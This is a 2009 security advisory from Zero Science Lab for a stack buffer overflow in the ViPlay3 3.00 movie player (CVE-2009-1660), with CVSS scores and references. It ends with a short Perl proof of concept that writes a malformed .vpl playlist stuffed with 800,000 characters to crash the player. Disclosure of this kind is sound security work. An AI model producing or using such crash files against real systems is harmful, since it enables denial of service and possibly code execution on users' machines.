CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
AI Score
Confidence
Low
EPSS
Percentile
95.6%
Title: ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
Advisory ID: ZSL-2009-4913
Type: Local
Impact: System Access, DoS
Risk: (3/5)
Release Date: 08.05.2009
ViPlay3 is a freeware movie player designed to play the most popular movie types using overlaying technology for a faster and more efficient way of video playback.
URUWorks ViPlay3 is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input (.vpl file). Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
URUWorks - <http://www.urusoft.net>
3.00
Microsoft Windows XP Professional SP3 (English)
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://packetstormsecurity.org/filedesc/viplay-overflow.txt.html>
[2] http://www.securityfocus.com/bid/34877
[3] <http://www.milw0rm.com/exploits/8644>
[4] <http://securityreason.com/exploitalert/6188>
[5] <https://vulners.com/cve/CVE-2009-1660>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2009-1660>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/50403>
[08.05.2009] - Initial release
[25.10.2021] - Added reference [5], [6] and [7]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009
$b= "[General]\r\n".
"Title=Proof of Concept\r\n".
"Author=LiquidWorm\r\n".
"Comments=2009\r\n".
"Version=1.0\r\n".
"[Files]\r\n";
"Count=800000\r\n".
"LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";</p></body></html>